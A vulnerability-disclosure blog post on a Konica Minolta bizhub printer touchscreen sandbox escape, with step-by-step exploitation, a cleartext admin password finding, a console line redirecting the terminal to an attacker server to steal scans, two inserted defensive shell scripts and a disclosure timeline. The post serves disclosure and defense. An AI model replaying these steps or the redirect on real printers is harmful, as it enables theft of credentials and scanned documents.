Someone call the patch manager

How COVID-19 left hundreds of thousands of printers vulnerable

The SEC Consult Vulnerability Lab identified a sandbox breakout vulnerability in multiple Konica Minolta bizhub MFP printers at the end of 2019 that could be exploited via physical access to a printer's touchscreen terminal. An attacker is able to get full read and write access to the printer's operating system and stored data as root. This can be used to manipulate and compromise the printer and its users in many ways. Konica Minolta reacted in an exemplary manner and fixed the vulnerabilities immediately at the beginning of 2020. They also kept the updates coming continuously during our responsible disclosure. Due to the large number of affected devices (hundreds of thousands of devices according to the vendor) and the need to apply the firmware update manually by service technicians, the process took quite some time, especially during the COVID-19 pandemic, with multiple lockdowns preventing technicians from going on-site.

This blog post describes the vulnerabilities and patches, a practical example of the attack as well as a word about the responsible disclosure timeline. Furthermore, a technical security advisory has been published as well containing the affected models and fixed firmware versions. 

A Different Approach to Printer Pentesting 

The classic way 

For years, a large number of printer vulnerabilities have been published regularly. Most of those vulnerabilities are found in one of the following parts of the printer:

  • The networking features and protocols exposed by the printers  

  • Printer Services 

  • Printer Software and Drivers 

  • (Web) Applications running on the printers themselves 

Very good research concerning classic printer vulnerabilities can be found at the following locations: 

https://www.blackhat.com/presentations/bh-asia-02/bh-asia-02-fx.pdf 

https://www.nds.ruhr-uni-bochum.de/media/ei/arbeiten/2017/01/30/exploiting-printers.pdf 

https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2019/august/the-cyber-risk-lurking-in-your-office-corner/ 

https://gsec.hitb.org/sg2019/sessions/why-you-should-fear-your-mundane-office-equipment/ → Very nice talk - we have been there personally  

http://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Diving-Into-Spooler-Discovering-Lpe-And-Rce-Vulnerabilities-In-Windows-Printer.pdf → PrintNightmare vulnerabilities 

A different route 

We tried to go a different route and focused on "the printer" itself. In the end it is just another computer with a housing fit to fulfill its purpose - in this case putting ink on paper. On most modern office printers you can find one or multiple of the following elements: 

  • A screen, or even a touchscreen 

  • Multiple inputs like keyboards, trackballs, touchscreens 

  • Multiple ports like USB, RJ-45, serial interfaces, etc. 

  • RFID readers for authentication 

Most printers also have in common that they use their display to show some kind of application running in full screen on top of a Unixoid operating system that is, or should be, locked down completely. This part is what we refer to from now on as the printer sandbox. All scenarios that we tested were done as an unauthenticated user with physical access to the printer's touchscreen.

We observed that by opening certain applications and/or settings via the terminal, it was possible to observe a slight change in the look and feel of the user interface itself. It was quickly determined that this was the result of a context change, meaning that the running applications are not based solely on the proprietary application. After attaching a keyboard to one of the multiple USB ports of the printer and pressing specific key combinations, it was possible to determine that some application parts are running in an ordinary Chromium browser in "kiosk mode", which can be escaped easily. This allows an attacker to get full access to the underlying printer's operating system and file system, including configuration files, passwords in clear text, proprietary scripts and much more. Access to all those files was easily possible as Chromium was running as root.

Figure: Konica Minolta bizhub C3300i with touchscreen terminal

The Test Subject 

The test subjects were Konica Minolta bizhub C3300i and C3350i printer devices - or more precisely their terminal. 

To get a small overview, the following picture shows the printer including the terminal. 

Proof-of-Concept 

SEC Consult identified three distinct security issues on the printer terminals. 

  1. Sandbox Escape on the Physical Printer Touch Screen Terminal (CVE-2022-29586)
  2. Passwords stored in clear text on the file system (CVE-2022-29588)
  3. Terminal UI/Chromium running as root (CVE-2022-29587)


Those issues are described in detail in the following paragraphs.

Vulnerability No. 1 - Sandbox Escape on the Physical Printer Touch Screen Terminal (CVE-2022-29586) 

A touch screen terminal is attached to the printer in order to manage print jobs, create new scans, simply copy a page or configure the device. The touch screen terminal hosts a user interface, which is based upon a proprietary application. By opening certain applications and/or settings via the terminal, it was possible to observe a slight change in the look and feel of the user interface itself. It was quickly determined that this was the result of a context change, meaning that the running applications are not based solely on the proprietary application. After attaching a keyboard to one of the multiple USB ports of the printer and pressing specific key combinations, it was possible to determine that some application parts are running in an ordinary Chromium browser in "kiosk mode", which can be escaped easily, although most of the key combinations were blacklisted. This allows an attacker to get full access to the underlying printer's operating system and file system, including configuration files, passwords in clear text, proprietary scripts and much more.

Figure: Public User Access button

Step 1 – Public User Access 

Physical access is required to exploit this vulnerability. "User Authentication" must be used, and "Public User Access" must be enabled on the device.  The "Public User Access" button needs to be pressed on the physical printer touch screen terminal. 

Figure: Press "Utility" button

Step 2 – Utility 

After clicking the public user access button, a menu opens up where one can select specific functions, like "Scan" or "Copy". The "Utility" button must be pressed in the next step of the exploit chain, as can be seen in the following figure: 

Figure: Utility function

Step 3 – Utility again 

There are several choices in the appearing menu where the "Utility" button must be pressed again, as shown in the following figure: 

Figure: Chromium in kiosk mode

Step 4 – Accessing Chromium 

A slight change in the design of the user interface can be observed after clicking on the "Utility" button marked red in the step above. The reason for that is that the application, which is now visible, is launched inside of a Chromium browser in kiosk mode. The loaded web application in Chromium can be seen in the following figure. 

Figure: Chromium developer console access

Step 5 – Attaching a keyboard 

An external keyboard was attached to the USB port since the onscreen keyboard does not provide any function keys like "CTRL", "ALT", "F1-F12". All affected printers provide USB ports.  

Step 6 – Access Chromium Developer Console 

Most of the shortcuts available are blocked on a normal Linux operating system or crash the printer terminal, but we were still able to get full access to the system by pressing the key F12, which opened up the Chromium developer console. This can be seen in the following figure. 

The tab "Sources" can then be used to access the file system. Now a folder can be added by clicking "Add folder to workspace". A window appears at the top edge when adding a folder (we added "/var/log/nginx/html/") which asks for approval to add this folder. Access to the selected folder is possible for an attacker after clicking the button "Allow".

From now on an attacker is able to: 

  • Read arbitrary files on the file system with root access 
  • Write arbitrary files, e.g. manipulate scripts of the web application (if they are not located on the read-only file system, which applies to some folders) 

Figure: ADMINPASS file containing the clear-text password displayed on the printer's touch screen.

Vulnerability No. 2 - Passwords stored in clear-text on the file system (CVE-2022-29588) 

As an example, an attacker can now access the directory "/var/log/nginx/html". This folder contains a file called ADMINPASS, which doesn't look suspicious at all - right? This file contains the administrator password for the printer terminal and web interface in plain text. 

Figure: Access to /etc/shadow file

Vulnerability No. 3 - Terminal UI/Chromium running as root (CVE-2022-29587) 

We also observed that we were able to access files such as /etc/shadow as can be seen in the following figure. 

This might indicate one of the following cases: 

  • A wrong set of permissions for files with sensitive data 
  • The Chromium browser is running as root 

Konica Minolta confirmed that the latter one is the case, and the browser session gives an attacker root access to the printer device. 
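As an added example (not Konica Minolta's code and not part of the advisory), the following shows how a kiosk-mode Chromium UI could be started so that the two conditions exploited above are removed: developer tools are disabled by managed policy, and the browser runs as a dedicated unprivileged user rather than root. Assumed: a user "kioskui" exists, Chromium reads managed policy from /etc/chromium/policies/managed, and the UI is served from the local nginx at http://127.0.0.1/.

```shell
#!/bin/sh
# Added hardening example, not vendor code. Assumptions: user "kioskui"
# exists, Chromium reads /etc/chromium/policies/managed/*.json, and the
# UI is served locally at http://127.0.0.1/.
#
# Weak shape implied by the finding: an init script running
#   chromium --kiosk http://127.0.0.1/
# as root, with no policy, so F12 opens DevTools and "Add folder to
# workspace" grants read/write access to the whole file system as root.

write_kiosk_policy() {
    # $1 = policy directory (parametrised so it can be tested in a temp dir)
    mkdir -p "$1"
    cat > "$1/kiosk.json" <<'EOF'
{
  "DeveloperToolsAvailability": 2,
  "URLBlocklist": ["*"],
  "URLAllowlist": ["http://127.0.0.1"],
  "ExtensionInstallBlocklist": ["*"]
}
EOF
    # DeveloperToolsAvailability=2 disallows DevTools entirely; the URL
    # lists keep a breakout from navigating the kiosk to an external host
    # (the document.location trick shown later on this page).
}

launch_kiosk() {
    # Drop to the dedicated UI account before starting the browser: a UI
    # breakout then inherits kioskui's permissions, not root's, so
    # /etc/shadow and the nginx web root stay out of reach.
    exec runuser -u kioskui -- chromium --kiosk --no-first-run \
        --incognito "http://127.0.0.1/"
}

# Only act when explicitly asked, so sourcing this file has no side effects.
if [ "${1:-}" = "run" ]; then
    write_kiosk_policy /etc/chromium/policies/managed
    launch_kiosk
fi
```

The policy file only takes effect if the policy directory is not writable by the kiosk user, which is a second reason the browser must not run as root.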

It must also be noted that the passwords are stored using crypt in the /etc/shadow file, which was also not best practice back in 2019/2020. 
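To make the point about crypt checkable, here is an added audit script (not from the advisory) that classifies /etc/shadow entries by hash format: a hash field beginning with "$id$" names its algorithm, while a field without that prefix is the 13-character traditional DES crypt(3) that silently truncates passwords to 8 characters. The sample shadow lines are constructed for the example.

```shell
#!/bin/sh
# Added example: audit shadow entries for legacy hash formats.
# Constructed sample data, not taken from any real device.

classify_hash() {
    # $1 = hash field of a shadow entry; prints a one-word verdict
    [ -z "$1" ] && { echo "locked"; return 0; }
    case "$1" in
        '!'*|'*')                echo "locked" ;;    # no usable password
        '$6$'*)                  echo "sha512" ;;
        '$5$'*)                  echo "sha256" ;;
        '$y$'*)                  echo "yescrypt" ;;
        '$7$'*)                  echo "scrypt" ;;
        '$2a$'*|'$2b$'*|'$2y$'*) echo "bcrypt" ;;
        '$1$'*)                  echo "md5-weak" ;;  # MD5-crypt, fast to brute-force
        '$'*)                    echo "unknown" ;;
        *)                       echo "des-weak" ;;  # traditional crypt(3), 8-char cap
    esac
}

audit_shadow() {
    # Reads shadow-format lines on stdin, prints "user verdict" per line,
    # and returns 1 if any account still uses a weak hash.
    rc=0
    while IFS=: read -r user hash _rest; do
        v=$(classify_hash "$hash")
        echo "$user $v"
        case "$v" in *-weak) rc=1 ;; esac
    done
    return $rc
}

# Constructed sample: one modern hash, one DES hash, one MD5 hash, one
# locked system account. Salts and hashes are placeholders.
SAMPLE_SHADOW='root:$6$saltsalt$placeholderhashvalue:18000:0:99999:7:::
admin:ab8xKd9Pqz0Lk:18000:0:99999:7:::
svc:$1$saltsalt$placeholderhash:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::'

run_sample() {
    # Expected output lists admin as des-weak and svc as md5-weak, exit 1.
    printf '%s\n' "$SAMPLE_SHADOW" | audit_shadow
}
```

On a real system run it as root with `audit_shadow < /etc/shadow`; a non-zero exit status means at least one account should be rehashed with a modern algorithm.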

Figure: Printer UI function

A practical example of an attack, or how to steal user data 

The possibilities are basically endless if an attacker gets full access as root to the printer's operating system. We tried to come up with some interesting ideas: 

  • Presenting a login screen to steal (domain) credentials 
  • Phish printed files and send them to an attacker-controlled SMB share 
  • Phish scans and send them to an attacker-controlled web server 

The latter example is documented in detail in the following paragraph. 

We are going to show now how easy it is to manipulate the user interface of the terminal in a way that it is easily possible to trick a regular user to scan documents and automatically forward them to an attacker-controlled server. 

The sandbox escape was exploited, and the location of the website was set to an attacker-controlled server via the following command executed in the Chromium developer console. 

document.location = "https://10.0.0.1:8888"

The whole screen of the printer terminal is now displaying the attacker-controlled website, containing a file upload, which is automatically triggered upon loading. A printer UI function is triggered instead of a regular Unix file open dialog on the operating system due to a special override of the printer. The printer UI function can be seen in the following figure. 

Figure: Successfully phished the scanned document on an attacker-controlled web server

If a user selects the scan feature, the document inside of the scanner is scanned and uploaded to the server hosted by the attacker. The successful upload of the file can be seen in the following figure. 

Affected Brands, Devices and Resellers 

According to the vendor, 46 Konica Minolta bizhub MFP models are affected. The number of affected machines in the field is in the hundreds of thousands of devices worldwide according to Konica Minolta. These devices are also rebranded and sold by other companies (OEM) which are affected as well. 

Workarounds, Countermeasures and Patches 

Johannes Kruchem and Werner Schober of the SEC Consult Vulnerability Lab (now an Atos company) identified the vulnerability at the end of 2019 and informed the Konica Minolta PSIRT, adhering to our responsible disclosure process. Konica Minolta provided a patch for the firmware and operating system very quickly at the start of 2020. This firmware update must be applied manually by service technicians on-site for most devices, as a remote service platform for remote firmware updates is not fully rolled out yet. Multiple COVID-19 lockdowns drastically delayed the patching of this large number of devices, hence our security advisory could only be released now in 2022, after all devices had been patched.

The following hardening/workaround information is available as well provided directly from Konica Minolta. 

Disable the use of the external USB keyboard by the "Customer Administrator" setting.
In addition, it is strongly recommended to change the Customer Admin password to a new one.

Hearing from our Sales Companies, most customers do not need to use the external keyboard.
Therefore, this workaround is effective for such customers until the FW is updated.

Our security advisory contains the full list of affected devices and firmware versions.

A Word about the Timeline 

In a typical responsible disclosure process the time between initial contact and release of the advisory is somewhere in the order of 50 days. Exceptions do of course apply. In this case the whole responsible disclosure process between first contact with Konica Minolta and the final release of the advisory was much longer: nearly three years passed between initial discovery, first contact and the final release of the advisory. The reasons for that are very interesting and diverse, which is why we want to talk about them here.

Reason 1 - COVID-19 Pandemic 

Believe it or not, the main reason why this responsible disclosure process took so long was the ongoing COVID-19 pandemic. Most vulnerable printers worldwide had to be patched manually. Combined with the fact that a Konica Minolta service technician must be physically present to patch most of the devices, and with many lockdowns hindering this procedure, the process took a very long time and was stretched out with every lockdown in various countries. Furthermore, many companies switched to 100% home office, which made it partially impossible for service technicians to patch the devices at short notice on the customer's premises.

Reason 2 - Missing Central Patch Management 

Konica Minolta had to visit most customers and patch most of the affected devices manually as their remote service platform for remote firmware updates is not fully rolled out yet. This manual procedure takes a lot of time. A central patch management solution (either locally at the customer's premises, or externally available) would make the patch management process way more efficient and cost-effective. 

Nevertheless, the Konica Minolta PSIRT handled the case in a very professional way, provided an encrypted communications channel and delivered continuous updates and detailed information about the progress. The patched firmware itself was also developed and available in a very short amount of time after initial contact. This is not the standard case, thank you for the good cooperation! 

Bottom line 

The identification of those critical vulnerabilities and the deficiencies in the remote patching process or firmware update architecture show that vendors have to proactively invest in secure software design at the beginning of the development life cycle. Subsequent fixing of security issues can lead to significant patch management costs for vendors or customers. This is true especially in this case when patches can't be automatically deployed for most devices and have to be manually applied by specialists on-site. Customers on the other hand will be left unprotected for a long period of time because of a flawed design principle. 

SEC Consult supports vendors during the whole secure software development life cycle or for identification of security vulnerabilities during penetration tests or IT infrastructure assessments. Additionally, our experts support implementing an information security management system in order to reduce future (patch) costs. 


These vulnerabilities were identified by Johannes Kruchem and Werner Schober and published on behalf of the SEC Consult Vulnerability Lab. 

SEC Consult is always searching for talented security professionals to work in our team. More information can be found at: https://www.sec-consult.com/career